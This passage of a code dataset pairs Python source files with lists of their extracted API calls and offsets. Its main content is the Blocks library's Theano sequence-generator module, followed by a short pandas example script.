"datetime.datetime.now",
"ossdbtoolsservice.query.file_storage_result_set.FileStorageResultSet",
"ossdbtoolsservice.query.in_memory_result_set.InMemoryResultSet",
"ossdbtoolsse... | [((7119, 7161), 'ossdbtoolsservice.query.in_memory_result_set.InMemoryResultSet', 'InMemoryResultSet', (['result_set_id', 'batch_id'], {}), '(result_set_id, batch_id)\n', (7136, 7161), False, 'from ossdbtoolsservice.query.in_memory_result_set import InMemoryResultSet\n'), ((7321, 7347), 'sqlparse.parse', 'sqlparse.parse', (['batch_text'], {}), '(batch_text)\n', (7335, 7347), False, 'import sqlparse\n'), ((2552, 2581), 'ossdbtoolsservice.query.contracts.BatchSummary.from_batch', 'BatchSummary.from_batch', (['self'], {}), '(self)\n', (2575, 2581), False, 'from ossdbtoolsservice.query.contracts import BatchSummary, SaveResultsRequestParams, SelectionData\n'), ((2986, 3026), 'ossdbtoolsservice.utils.time.get_time_str', 'get_time_str', (['self._execution_start_time'], {}), '(self._execution_start_time)\n', (2998, 3026), False, 'from ossdbtoolsservice.utils.time import get_time_str, get_elapsed_time_str\n'), ((3088, 3126), 'ossdbtoolsservice.utils.time.get_time_str', 'get_time_str', (['self._execution_end_time'], {}), '(self._execution_end_time)\n', (3100, 3126), False, 'from ossdbtoolsservice.utils.time import get_time_str, get_elapsed_time_str\n'), ((3192, 3266), 'ossdbtoolsservice.utils.time.get_elapsed_time_str', 'get_elapsed_time_str', (['self._execution_start_time', 'self._execution_end_time'], {}), '(self._execution_start_time, self._execution_end_time)\n', (3212, 3266), False, 'from ossdbtoolsservice.utils.time import get_time_str, get_elapsed_time_str\n'), ((3937, 3951), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (3949, 3951), False, 'from datetime import datetime\n'), ((7061, 7106), 'ossdbtoolsservice.query.file_storage_result_set.FileStorageResultSet', 'FileStorageResultSet', (['result_set_id', 'batch_id'], {}), '(result_set_id, batch_id)\n', (7081, 7106), False, 'from ossdbtoolsservice.query.file_storage_result_set import FileStorageResultSet\n'), ((4913, 4927), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (4925, 4927), False, 'from datetime import datetime\n'), ((6437, 6449), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (6447, 6449), False, 'import uuid\n')] |
"""Sequence generation framework.
Recurrent networks are often used to generate/model sequences.
Examples include language modelling, machine translation, handwriting
synthesis, etc.. A typical pattern in this context is that
sequence elements are generated one often another, and every generated
element is fed back into the recurrent network state. Sometimes
also an attention mechanism is used to condition sequence generation
on some structured input like another sequence or an image.
This module provides :class:`SequenceGenerator` that builds a sequence
generating network from three main components:
* a core recurrent transition, e.g. :class:`~blocks.bricks.recurrent.LSTM`
or :class:`~blocks.bricks.recurrent.GatedRecurrent`
* a readout component that can produce sequence elements using
the network state and the information from the attention mechanism
* an attention mechanism (see :mod:`~blocks.bricks.attention` for
more information)
Implementation-wise :class:`SequenceGenerator` fully relies on
:class:`BaseSequenceGenerator`. At the level of the latter an
attention is mandatory, moreover it must be a part of the recurrent
transition (see :class:`~blocks.bricks.attention.AttentionRecurrent`).
To simulate optional attention, :class:`SequenceGenerator` wraps the
pure recurrent network in :class:`FakeAttentionRecurrent`.
"""
from abc import ABCMeta, abstractmethod
from six import add_metaclass
from theano import tensor
from blocks.bricks import Initializable, Random, Bias, NDimensionalSoftmax
from blocks.bricks.base import application, Brick, lazy
from blocks.bricks.parallel import Fork, Merge
from blocks.bricks.lookup import LookupTable
from blocks.bricks.recurrent import recurrent
from blocks.bricks.attention import (
AbstractAttentionRecurrent, AttentionRecurrent)
from blocks.roles import add_role, COST
from blocks.utils import dict_union, dict_subset
class BaseSequenceGenerator(Initializable):
r"""A generic sequence generator.
This class combines two components, a readout network and an
attention-equipped recurrent transition, into a context-dependent
sequence generator. Third component must be also given which
forks feedback from the readout network to obtain inputs for the
transition.
The class provides two methods: :meth:`generate` and :meth:`cost`. The
former is to actually generate sequences and the latter is to compute
the cost of generating given sequences.
The generation algorithm description follows.
**Definitions and notation:**
* States :math:`s_i` of the generator are the states of the transition
as specified in `transition.state_names`.
* Contexts of the generator are the contexts of the
transition as specified in `transition.context_names`.
* Glimpses :math:`g_i` are intermediate entities computed at every
generation step from states, contexts and the previous step glimpses.
They are computed in the transition's `apply` method when not given
or by explicitly calling the transition's `take_glimpses` method. The
set of glimpses considered is specified in
`transition.glimpse_names`.
* Outputs :math:`y_i` are produced at every step and form the output
sequence. A generation cost :math:`c_i` is assigned to each output.
**Algorithm:**
1. Initialization.
.. math::
y_0 = readout.initial\_outputs(contexts)\\
s_0, g_0 = transition.initial\_states(contexts)\\
i = 1\\
By default all recurrent bricks from :mod:`~blocks.bricks.recurrent`
have trainable initial states initialized with zeros. Subclass them
or :class:`~blocks.bricks.recurrent.BaseRecurrent` directly to get
custom initial states.
2. New glimpses are computed:
.. math:: g_i = transition.take\_glimpses(
s_{i-1}, g_{i-1}, contexts)
3. A new output is generated by the readout and its cost is
computed:
.. math::
f_{i-1} = readout.feedback(y_{i-1}) \\
r_i = readout.readout(f_{i-1}, s_{i-1}, g_i, contexts) \\
y_i = readout.emit(r_i) \\
c_i = readout.cost(r_i, y_i)
Note that the *new* glimpses and the *old* states are used at this
step. The reason for not merging all readout methods into one is
to make an efficient implementation of :meth:`cost` possible.
4. New states are computed and iteration is done:
.. math::
f_i = readout.feedback(y_i) \\
s_i = transition.compute\_states(s_{i-1}, g_i,
fork.apply(f_i), contexts) \\
i = i + 1
5. Back to step 2 if the desired sequence
length has not been yet reached.
| A scheme of the algorithm described above follows.
.. image:: /_static/sequence_generator_scheme.png
:height: 500px
:width: 500px
..
Parameters
----------
readout : instance of :class:`AbstractReadout`
The readout component of the sequence generator.
transition : instance of :class:`AbstractAttentionRecurrent`
The transition component of the sequence generator.
fork : :class:`~.bricks.Brick`
The brick to compute the transition's inputs from the feedback.
See Also
--------
:class:`.Initializable` : for initialization parameters
:class:`SequenceGenerator` : more user friendly interface to this\
brick
"""
@lazy()
def __init__(self, readout, transition, fork, **kwargs):
self.readout = readout
self.transition = transition
self.fork = fork
children = [self.readout, self.fork, self.transition]
kwargs.setdefault('children', []).extend(children)
super(BaseSequenceGenerator, self).__init__(**kwargs)
@property
def _state_names(self):
return self.transition.compute_states.outputs
@property
def _context_names(self):
return self.transition.apply.contexts
@property
def _glimpse_names(self):
return self.transition.take_glimpses.outputs
def _push_allocation_config(self):
# Configure readout. That involves `get_dim` requests
# to the transition. To make sure that it answers
# correctly we should finish its configuration first.
self.transition.push_allocation_config()
transition_sources = (self._state_names + self._context_names +
self._glimpse_names)
self.readout.source_dims = [self.transition.get_dim(name)
if name in transition_sources
else self.readout.get_dim(name)
for name in self.readout.source_names]
# Configure fork. For similar reasons as outlined above,
# first push `readout` configuration.
self.readout.push_allocation_config()
feedback_name, = self.readout.feedback.outputs
self.fork.input_dim = self.readout.get_dim(feedback_name)
self.fork.output_dims = self.transition.get_dims(
self.fork.apply.outputs)
@application
def cost(self, application_call, outputs, mask=None, **kwargs):
"""Returns the average cost over the minibatch.
The cost is computed by averaging the sum of per token costs for
each sequence over the minibatch.
.. warning::
Note that, the computed cost can be problematic when batches
consist of vastly different sequence lengths.
Parameters
----------
outputs : :class:`~tensor.TensorVariable`
The 3(2) dimensional tensor containing output sequences.
The axis 0 must stand for time, the axis 1 for the
position in the batch.
mask : :class:`~tensor.TensorVariable`
The binary matrix identifying fake outputs.
Returns
-------
cost : :class:`~tensor.Variable`
Theano variable for cost, computed by summing over timesteps
and then averaging over the minibatch.
Notes
-----
The contexts are expected as keyword arguments.
Adds average cost per sequence element `AUXILIARY` variable to
the computational graph with name ``per_sequence_element``.
"""
# Compute the sum of costs
costs = self.cost_matrix(outputs, mask=mask, **kwargs)
cost = tensor.mean(costs.sum(axis=0))
add_role(cost, COST)
# Add auxiliary variable for per sequence element cost
application_call.add_auxiliary_variable(
(costs.sum() / mask.sum()) if mask is not None else costs.mean(),
name='per_sequence_element')
return cost
@application
def cost_matrix(self, application_call, outputs, mask=None, **kwargs):
"""Returns generation costs for output sequences.
See Also
--------
:meth:`cost` : Scalar cost.
"""
# We assume the data has axes (time, batch, features, ...)
batch_size = outputs.shape[1]
# Prepare input for the iterative part
states = dict_subset(kwargs, self._state_names, must_have=False)
# masks in context are optional (e.g. `attended_mask`)
contexts = dict_subset(kwargs, self._context_names, must_have=False)
feedback = self.readout.feedback(outputs)
inputs = self.fork.apply(feedback, as_dict=True)
# Run the recurrent network
results = self.transition.apply(
mask=mask, return_initial_states=True, as_dict=True,
**dict_union(inputs, states, contexts))
# Separate the deliverables. The last states are discarded: they
# are not used to predict any output symbol. The initial glimpses
# are discarded because they are not used for prediction.
# Remember, glimpses are computed _before_ output stage, states are
# computed after.
states = {name: results[name][:-1] for name in self._state_names}
glimpses = {name: results[name][1:] for name in self._glimpse_names}
# Compute the cost
feedback = tensor.roll(feedback, 1, 0)
feedback = tensor.set_subtensor(
feedback[0],
self.readout.feedback(self.readout.initial_outputs(batch_size)))
readouts = self.readout.readout(
feedback=feedback, **dict_union(states, glimpses, contexts))
costs = self.readout.cost(readouts, outputs)
if mask is not None:
costs *= mask
for name, variable in list(glimpses.items()) + list(states.items()):
application_call.add_auxiliary_variable(
variable.copy(), name=name)
# This variables can be used to initialize the initial states of the
# next batch using the last states of the current batch.
for name in self._state_names + self._glimpse_names:
application_call.add_auxiliary_variable(
results[name][-1].copy(), name=name+"_final_value")
return costs
@recurrent
def generate(self, outputs, **kwargs):
"""A sequence generation step.
Parameters
----------
outputs : :class:`~tensor.TensorVariable`
The outputs from the previous step.
Notes
-----
The contexts, previous states and glimpses are expected as keyword
arguments.
"""
states = dict_subset(kwargs, self._state_names)
# masks in context are optional (e.g. `attended_mask`)
contexts = dict_subset(kwargs, self._context_names, must_have=False)
glimpses = dict_subset(kwargs, self._glimpse_names)
next_glimpses = self.transition.take_glimpses(
as_dict=True, **dict_union(states, glimpses, contexts))
next_readouts = self.readout.readout(
feedback=self.readout.feedback(outputs),
**dict_union(states, next_glimpses, contexts))
next_outputs = self.readout.emit(next_readouts)
next_costs = self.readout.cost(next_readouts, next_outputs)
next_feedback = self.readout.feedback(next_outputs)
next_inputs = (self.fork.apply(next_feedback, as_dict=True)
if self.fork else {'feedback': next_feedback})
next_states = self.transition.compute_states(
as_list=True,
**dict_union(next_inputs, states, next_glimpses, contexts))
return (next_states + [next_outputs] +
list(next_glimpses.values()) + [next_costs])
@generate.delegate
def generate_delegate(self):
return self.transition.apply
@generate.property('states')
def generate_states(self):
return self._state_names + ['outputs'] + self._glimpse_names
@generate.property('outputs')
def generate_outputs(self):
return (self._state_names + ['outputs'] +
self._glimpse_names + ['costs'])
def get_dim(self, name):
if name in (self._state_names + self._context_names +
self._glimpse_names):
return self.transition.get_dim(name)
elif name == 'outputs':
return self.readout.get_dim(name)
return super(BaseSequenceGenerator, self).get_dim(name)
@application
def initial_states(self, batch_size, *args, **kwargs):
# TODO: support dict of outputs for application methods
# to simplify this code.
state_dict = dict(
self.transition.initial_states(
batch_size, as_dict=True, *args, **kwargs),
outputs=self.readout.initial_outputs(batch_size))
return [state_dict[state_name]
for state_name in self.generate.states]
@initial_states.property('outputs')
def initial_states_outputs(self):
return self.generate.states
@add_metaclass(ABCMeta)
class AbstractReadout(Initializable):
"""The interface for the readout component of a sequence generator.
The readout component of a sequence generator is a bridge between
the core recurrent network and the output sequence.
Parameters
----------
source_names : list
A list of the source names (outputs) that are needed for the
readout part e.g. ``['states']`` or
``['states', 'weighted_averages']`` or ``['states', 'feedback']``.
readout_dim : int
The dimension of the readout.
Attributes
----------
source_names : list
readout_dim : int
See Also
--------
:class:`BaseSequenceGenerator` : see how exactly a readout is used
:class:`Readout` : the typically used readout brick
"""
@lazy(allocation=['source_names', 'readout_dim'])
def __init__(self, source_names, readout_dim, **kwargs):
self.source_names = source_names
self.readout_dim = readout_dim
super(AbstractReadout, self).__init__(**kwargs)
@abstractmethod
def emit(self, readouts):
"""Produce outputs from readouts.
Parameters
----------
readouts : :class:`~theano.Variable`
Readouts produced by the :meth:`readout` method of
a `(batch_size, readout_dim)` shape.
"""
pass
@abstractmethod
def cost(self, readouts, outputs):
"""Compute generation cost of outputs given readouts.
Parameters
----------
readouts : :class:`~theano.Variable`
Readouts produced by the :meth:`readout` method
of a `(..., readout dim)` shape.
outputs : :class:`~theano.Variable`
Outputs whose cost should be computed. Should have as many
or one less dimensions compared to `readout`. If readout has
`n` dimensions, first `n - 1` dimensions of `outputs` should
match with those of `readouts`.
"""
pass
@abstractmethod
def initial_outputs(self, batch_size):
"""Compute initial outputs for the generator's first step.
In the notation from the :class:`BaseSequenceGenerator`
documentation this method should compute :math:`y_0`.
"""
pass
@abstractmethod
def readout(self, **kwargs):
r"""Compute the readout vector from states, glimpses, etc.
Parameters
----------
\*\*kwargs: dict
Contains sequence generator states, glimpses,
contexts and feedback from the previous outputs.
"""
pass
@abstractmethod
def feedback(self, outputs):
"""Feeds outputs back to be used as inputs of the transition."""
pass
class Readout(AbstractReadout):
r"""Readout brick with separated emitter and feedback parts.
:class:`Readout` combines a few bits and pieces into an object
that can be used as the readout component in
:class:`BaseSequenceGenerator`. This includes an emitter brick,
to which :meth:`emit`, :meth:`cost` and :meth:`initial_outputs`
calls are delegated, a feedback brick to which :meth:`feedback`
functionality is delegated, and a pipeline to actually compute
readouts from all the sources (see the `source_names` attribute
of :class:`AbstractReadout`).
The readout computation pipeline is constructed from `merge` and
`post_merge` brick, whose responsibilites are described in the
respective docstrings.
Parameters
----------
emitter : an instance of :class:`AbstractEmitter`
The emitter component.
feedback_brick : an instance of :class:`AbstractFeedback`
The feedback component.
merge : :class:`~.bricks.Brick`, optional
A brick that takes the sources given in `source_names` as an input
and combines them into a single output. If given, `merge_prototype`
cannot be given.
merge_prototype : :class:`.FeedForward`, optional
If `merge` isn't given, the transformation given by
`merge_prototype` is applied to each input before being summed. By
default a :class:`.Linear` transformation without biases is used.
If given, `merge` cannot be given.
post_merge : :class:`.Feedforward`, optional
This transformation is applied to the merged inputs. By default
:class:`.Bias` is used.
merged_dim : int, optional
The input dimension of `post_merge` i.e. the output dimension of
`merge` (or `merge_prototype`). If not give, it is assumed to be
the same as `readout_dim` (i.e. `post_merge` is assumed to not
change dimensions).
\*\*kwargs : dict
Passed to the parent's constructor.
See Also
--------
:class:`BaseSequenceGenerator` : see how exactly a readout is used
:class:`AbstractEmitter`, :class:`AbstractFeedback`
"""
def __init__(self, emitter=None, feedback_brick=None,
merge=None, merge_prototype=None,
post_merge=None, merged_dim=None, **kwargs):
if not emitter:
emitter = TrivialEmitter(kwargs['readout_dim'])
if not feedback_brick:
feedback_brick = TrivialFeedback(kwargs['readout_dim'])
if not merge:
merge = Merge(input_names=kwargs['source_names'],
prototype=merge_prototype)
if not post_merge:
post_merge = Bias(dim=kwargs['readout_dim'])
if not merged_dim:
merged_dim = kwargs['readout_dim']
self.emitter = emitter
self.feedback_brick = feedback_brick
self.merge = merge
self.post_merge = post_merge
self.merged_dim = merged_dim
children = [self.emitter, self.feedback_brick, self.merge,
self.post_merge]
kwargs.setdefault('children', []).extend(children)
super(Readout, self).__init__(**kwargs)
def _push_allocation_config(self):
self.emitter.readout_dim = self.get_dim('readouts')
self.feedback_brick.output_dim = self.get_dim('outputs')
self.merge.input_names = self.source_names
self.merge.input_dims = self.source_dims
self.merge.output_dim = self.merged_dim
self.post_merge.input_dim = self.merged_dim
self.post_merge.output_dim = self.readout_dim
@application
def readout(self, **kwargs):
merged = self.merge.apply(**{name: kwargs[name]
for name in self.merge.input_names})
merged = self.post_merge.apply(merged)
return merged
@application
def emit(self, readouts):
return self.emitter.emit(readouts)
@application
def cost(self, readouts, outputs):
return self.emitter.cost(readouts, outputs)
@application
def initial_outputs(self, batch_size):
return self.emitter.initial_outputs(batch_size)
@application(outputs=['feedback'])
def feedback(self, outputs):
return self.feedback_brick.feedback(outputs)
def get_dim(self, name):
if name == 'outputs':
return self.emitter.get_dim(name)
elif name == 'feedback':
return self.feedback_brick.get_dim(name)
elif name == 'readouts':
return self.readout_dim
return super(Readout, self).get_dim(name)
@add_metaclass(ABCMeta)
class AbstractEmitter(Brick):
"""The interface for the emitter component of a readout.
Attributes
----------
readout_dim : int
The dimension of the readout. Is given by the
:class:`Readout` brick when allocation configuration
is pushed.
See Also
--------
:class:`Readout`
:class:`SoftmaxEmitter` : for integer outputs
Notes
-----
An important detail about the emitter cost is that it will be
evaluated with inputs of different dimensions so it has to be
flexible enough to handle this. The two ways in which it can be
applied are:
1. In :meth:BaseSequenceGenerator.cost_matrix where it will
be applied to the whole sequence at once.
2. In :meth:BaseSequenceGenerator.generate where it will be
applied to only one step of the sequence.
"""
@abstractmethod
def emit(self, readouts):
"""Implements the respective method of :class:`Readout`."""
pass
@abstractmethod
def cost(self, readouts, outputs):
"""Implements the respective method of :class:`Readout`."""
pass
@abstractmethod
def initial_outputs(self, batch_size):
"""Implements the respective method of :class:`Readout`."""
pass
@add_metaclass(ABCMeta)
class AbstractFeedback(Brick):
"""The interface for the feedback component of a readout.
See Also
--------
:class:`Readout`
:class:`LookupFeedback` for integer outputs
"""
@abstractmethod
def feedback(self, outputs):
"""Implements the respective method of :class:`Readout`."""
pass
class TrivialEmitter(AbstractEmitter):
"""An emitter for the trivial case when readouts are outputs.
Parameters
----------
readout_dim : int
The dimension of the readout.
Notes
-----
By default :meth:`cost` always returns zero tensor.
"""
@lazy(allocation=['readout_dim'])
def __init__(self, readout_dim, **kwargs):
super(TrivialEmitter, self).__init__(**kwargs)
self.readout_dim = readout_dim
@application
def emit(self, readouts):
return readouts
@application
def cost(self, readouts, outputs):
return tensor.zeros_like(outputs)
@application
def initial_outputs(self, batch_size):
return tensor.zeros((batch_size, self.readout_dim))
def get_dim(self, name):
if name == 'outputs':
return self.readout_dim
return super(TrivialEmitter, self).get_dim(name)
class SoftmaxEmitter(AbstractEmitter, Initializable, Random):
"""A softmax emitter for the case of integer outputs.
Interprets readout elements as energies corresponding to their indices.
Parameters
----------
initial_output : int or a scalar :class:`~theano.Variable`
The initial output.
"""
def __init__(self, initial_output=0, **kwargs):
self.initial_output = initial_output
self.softmax = NDimensionalSoftmax()
children = [self.softmax]
kwargs.setdefault('children', []).extend(children)
super(SoftmaxEmitter, self).__init__(**kwargs)
@application
def probs(self, readouts):
return self.softmax.apply(readouts, extra_ndim=readouts.ndim - 2)
@application
def emit(self, readouts):
probs = self.probs(readouts)
batch_size = probs.shape[0]
pvals_flat = probs.reshape((batch_size, -1))
generated = self.theano_rng.multinomial(pvals=pvals_flat)
return generated.reshape(probs.shape).argmax(axis=-1)
@application
def cost(self, readouts, outputs):
# WARNING: unfortunately this application method works
# just fine when `readouts` and `outputs` have
# different dimensions. Be careful!
return self.softmax.categorical_cross_entropy(
outputs, readouts, extra_ndim=readouts.ndim - 2)
@application
def initial_outputs(self, batch_size):
return self.initial_output * tensor.ones((batch_size,), dtype='int64')
def get_dim(self, name):
if name == 'outputs':
return 0
return super(SoftmaxEmitter, self).get_dim(name)
class TrivialFeedback(AbstractFeedback):
"""A feedback brick for the case when readout are outputs."""
@lazy(allocation=['output_dim'])
def __init__(self, output_dim, **kwargs):
super(TrivialFeedback, self).__init__(**kwargs)
self.output_dim = output_dim
@application(outputs=['feedback'])
def feedback(self, outputs):
return outputs
def get_dim(self, name):
if name == 'feedback':
return self.output_dim
return super(TrivialFeedback, self).get_dim(name)
class LookupFeedback(AbstractFeedback, Initializable):
"""A feedback brick for the case when readout are integers.
Stores and retrieves distributed representations of integers.
"""
def __init__(self, num_outputs=None, feedback_dim=None, **kwargs):
self.num_outputs = num_outputs
self.feedback_dim = feedback_dim
self.lookup = LookupTable(num_outputs, feedback_dim)
children = [self.lookup]
kwargs.setdefault('children', []).extend(children)
super(LookupFeedback, self).__init__(**kwargs)
def _push_allocation_config(self):
self.lookup.length = self.num_outputs
self.lookup.dim = self.feedback_dim
@application
def feedback(self, outputs):
assert self.output_dim == 0
return self.lookup.apply(outputs)
def get_dim(self, name):
if name == 'feedback':
return self.feedback_dim
return super(LookupFeedback, self).get_dim(name)
class FakeAttentionRecurrent(AbstractAttentionRecurrent, Initializable):
"""Adds fake attention interface to a transition.
:class:`BaseSequenceGenerator` requires its transition brick to support
:class:`~blocks.bricks.attention.AbstractAttentionRecurrent` interface,
that is to have an embedded attention mechanism. For the cases when no
attention is required (e.g. language modeling or encoder-decoder
models), :class:`FakeAttentionRecurrent` is used to wrap a usual
recurrent brick. The resulting brick has no glimpses and simply
passes all states and contexts to the wrapped one.
.. todo::
Get rid of this brick and support attention-less transitions
in :class:`BaseSequenceGenerator`.
"""
def __init__(self, transition, **kwargs):
self.transition = transition
self.state_names = transition.apply.states
self.context_names = transition.apply.contexts
self.glimpse_names = []
children = [self.transition]
kwargs.setdefault('children', []).extend(children)
super(FakeAttentionRecurrent, self).__init__(**kwargs)
@application
def apply(self, *args, **kwargs):
return self.transition.apply(*args, **kwargs)
@apply.delegate
def apply_delegate(self):
return self.transition.apply
@application
def compute_states(self, *args, **kwargs):
return self.transition.apply(iterate=False, *args, **kwargs)
@compute_states.delegate
def compute_states_delegate(self):
return self.transition.apply
@application(outputs=[])
def take_glimpses(self, *args, **kwargs):
return None
@application
def initial_states(self, batch_size, *args, **kwargs):
return self.transition.initial_states(batch_size,
*args, **kwargs)
@initial_states.property('outputs')
def initial_states_outputs(self):
return self.transition.apply.states
def get_dim(self, name):
return self.transition.get_dim(name)
class SequenceGenerator(BaseSequenceGenerator):
r"""A more user-friendly interface for :class:`BaseSequenceGenerator`.
Parameters
----------
readout : instance of :class:`AbstractReadout`
The readout component for the sequence generator.
transition : instance of :class:`.BaseRecurrent`
The recurrent transition to be used in the sequence generator.
Will be combined with `attention`, if that one is given.
attention : object, optional
The attention mechanism to be added to ``transition``,
an instance of
:class:`~blocks.bricks.attention.AbstractAttention`.
add_contexts : bool
If ``True``, the
:class:`.AttentionRecurrent` wrapping the
`transition` will add additional contexts for the attended and its
mask.
\*\*kwargs : dict
All keywords arguments are passed to the base class. If `fork`
keyword argument is not provided, :class:`.Fork` is created
that forks all transition sequential inputs without a "mask"
substring in them.
"""
def __init__(self, readout, transition, attention=None,
add_contexts=True, **kwargs):
normal_inputs = [name for name in transition.apply.sequences
if 'mask' not in name]
kwargs.setdefault('fork', Fork(normal_inputs))
if attention:
transition = AttentionRecurrent(
transition, attention,
add_contexts=add_contexts, name="att_trans")
else:
transition = FakeAttentionRecurrent(transition,
name="with_fake_attention")
super(SequenceGenerator, self).__init__(
readout, transition, **kwargs)
| [
"blocks.bricks.NDimensionalSoftmax",
"theano.tensor.roll",
"theano.tensor.ones",
"six.add_metaclass",
"blocks.utils.dict_union",
"blocks.bricks.Bias",
"blocks.bricks.base.lazy",
"theano.tensor.zeros_like",
"blocks.bricks.base.application",
"theano.tensor.zeros",
"blocks.roles.add_role",
"block... | [((13908, 13930), 'six.add_metaclass', 'add_metaclass', (['ABCMeta'], {}), '(ABCMeta)\n', (13921, 13930), False, 'from six import add_metaclass\n'), ((21289, 21311), 'six.add_metaclass', 'add_metaclass', (['ABCMeta'], {}), '(ABCMeta)\n', (21302, 21311), False, 'from six import add_metaclass\n'), ((22594, 22616), 'six.add_metaclass', 'add_metaclass', (['ABCMeta'], {}), '(ABCMeta)\n', (22607, 22616), False, 'from six import add_metaclass\n'), ((5481, 5487), 'blocks.bricks.base.lazy', 'lazy', ([], {}), '()\n', (5485, 5487), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((14717, 14765), 'blocks.bricks.base.lazy', 'lazy', ([], {'allocation': "['source_names', 'readout_dim']"}), "(allocation=['source_names', 'readout_dim'])\n", (14721, 14765), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((20855, 20888), 'blocks.bricks.base.application', 'application', ([], {'outputs': "['feedback']"}), "(outputs=['feedback'])\n", (20866, 20888), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((23239, 23271), 'blocks.bricks.base.lazy', 'lazy', ([], {'allocation': "['readout_dim']"}), "(allocation=['readout_dim'])\n", (23243, 23271), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((25630, 25661), 'blocks.bricks.base.lazy', 'lazy', ([], {'allocation': "['output_dim']"}), "(allocation=['output_dim'])\n", (25634, 25661), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((25807, 25840), 'blocks.bricks.base.application', 'application', ([], {'outputs': "['feedback']"}), "(outputs=['feedback'])\n", (25818, 25840), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((28605, 28628), 'blocks.bricks.base.application', 'application', ([], {'outputs': '[]'}), '(outputs=[])\n', (28616, 28628), False, 'from blocks.bricks.base import application, Brick, lazy\n'), ((8513, 8533), 'blocks.roles.add_role', 'add_role', (['cost', 'COST'], {}), '(cost, COST)\n', (8521, 8533), False, 'from blocks.roles import add_role, COST\n'), ((9191, 9246), 'blocks.utils.dict_subset', 'dict_subset', (['kwargs', 'self._state_names'], {'must_have': '(False)'}), '(kwargs, self._state_names, must_have=False)\n', (9202, 9246), False, 'from blocks.utils import dict_union, dict_subset\n'), ((9329, 9386), 'blocks.utils.dict_subset', 'dict_subset', (['kwargs', 'self._context_names'], {'must_have': '(False)'}), '(kwargs, self._context_names, must_have=False)\n', (9340, 9386), False, 'from blocks.utils import dict_union, dict_subset\n'), ((10203, 10230), 'theano.tensor.roll', 'tensor.roll', (['feedback', '(1)', '(0)'], {}), '(feedback, 1, 0)\n', (10214, 10230), False, 'from theano import tensor\n'), ((11506, 11544), 'blocks.utils.dict_subset', 'dict_subset', (['kwargs', 'self._state_names'], {}), '(kwargs, self._state_names)\n', (11517, 11544), False, 'from blocks.utils import dict_union, dict_subset\n'), ((11627, 11684), 'blocks.utils.dict_subset', 'dict_subset', (['kwargs', 'self._context_names'], {'must_have': '(False)'}), '(kwargs, self._context_names, must_have=False)\n', (11638, 11684), False, 'from blocks.utils import dict_union, dict_subset\n'), ((11704, 11744), 'blocks.utils.dict_subset', 'dict_subset', (['kwargs', 'self._glimpse_names'], {}), '(kwargs, self._glimpse_names)\n', (11715, 11744), False, 'from blocks.utils import dict_union, dict_subset\n'), ((23557, 23583), 'theano.tensor.zeros_like', 'tensor.zeros_like', (['outputs'], {}), '(outputs)\n', (23574, 23583), False, 'from theano import tensor\n'), ((23660, 23704), 'theano.tensor.zeros', 'tensor.zeros', (['(batch_size, self.readout_dim)'], {}), '((batch_size, self.readout_dim))\n', (23672, 23704), False, 'from theano import tensor\n'), ((24308, 24329), 'blocks.bricks.NDimensionalSoftmax', 'NDimensionalSoftmax', ([], {}), '()\n', (24327, 24329), False, 'from blocks.bricks import Initializable, Random, Bias, NDimensionalSoftmax\n'), ((26422, 26460), 'blocks.bricks.lookup.LookupTable', 'LookupTable', (['num_outputs', 'feedback_dim'], {}), '(num_outputs, feedback_dim)\n', (26433, 26460), False, 'from blocks.bricks.lookup import LookupTable\n'), ((19221, 19289), 'blocks.bricks.parallel.Merge', 'Merge', ([], {'input_names': "kwargs['source_names']", 'prototype': 'merge_prototype'}), "(input_names=kwargs['source_names'], prototype=merge_prototype)\n", (19226, 19289), False, 'from blocks.bricks.parallel import Fork, Merge\n'), ((19368, 19399), 'blocks.bricks.Bias', 'Bias', ([], {'dim': "kwargs['readout_dim']"}), "(dim=kwargs['readout_dim'])\n", (19372, 19399), False, 'from blocks.bricks import Initializable, Random, Bias, NDimensionalSoftmax\n'), ((25336, 25377), 'theano.tensor.ones', 'tensor.ones', (['(batch_size,)'], {'dtype': '"""int64"""'}), "((batch_size,), dtype='int64')\n", (25347, 25377), False, 'from theano import tensor\n'), ((30437, 30456), 'blocks.bricks.parallel.Fork', 'Fork', (['normal_inputs'], {}), '(normal_inputs)\n', (30441, 30456), False, 'from blocks.bricks.parallel import Fork, Merge\n'), ((30505, 30596), 'blocks.bricks.attention.AttentionRecurrent', 'AttentionRecurrent', (['transition', 'attention'], {'add_contexts': 'add_contexts', 'name': '"""att_trans"""'}), "(transition, attention, add_contexts=add_contexts, name=\n 'att_trans')\n", (30523, 30596), False, 'from blocks.bricks.attention import AbstractAttentionRecurrent, AttentionRecurrent\n'), ((9651, 9687), 'blocks.utils.dict_union', 'dict_union', (['inputs', 'states', 'contexts'], {}), '(inputs, states, contexts)\n', (9661, 9687), False, 'from blocks.utils import dict_union, dict_subset\n'), ((10448, 10486), 'blocks.utils.dict_union', 'dict_union', (['states', 'glimpses', 'contexts'], {}), '(states, glimpses, contexts)\n', (10458, 10486), False, 'from blocks.utils import dict_union, dict_subset\n'), ((11829, 11867), 'blocks.utils.dict_union', 'dict_union', (['states', 'glimpses', 'contexts'], {}), '(states, glimpses, contexts)\n', (11839, 11867), False, 'from blocks.utils import dict_union, dict_subset\n'), ((11982, 12025), 'blocks.utils.dict_union', 'dict_union', (['states', 'next_glimpses', 'contexts'], {}), '(states, next_glimpses, contexts)\n', (11992, 12025), False, 'from blocks.utils import dict_union, dict_subset\n'), ((12443, 12499), 'blocks.utils.dict_union', 'dict_union', (['next_inputs', 'states', 'next_glimpses', 'contexts'], {}), '(next_inputs, states, next_glimpses, contexts)\n', (12453, 12499), False, 'from blocks.utils import dict_union, dict_subset\n')] |
import pandas as pd
from my_mod import enlarge
print("Hello!")
df = pd.DataFrame({"a":[1,2,3], "b":[4,5,6]})
print(df.head())
x = 11
print(enlarge(x)) | [
"pandas.DataFrame",
"my_mod.enlarge"
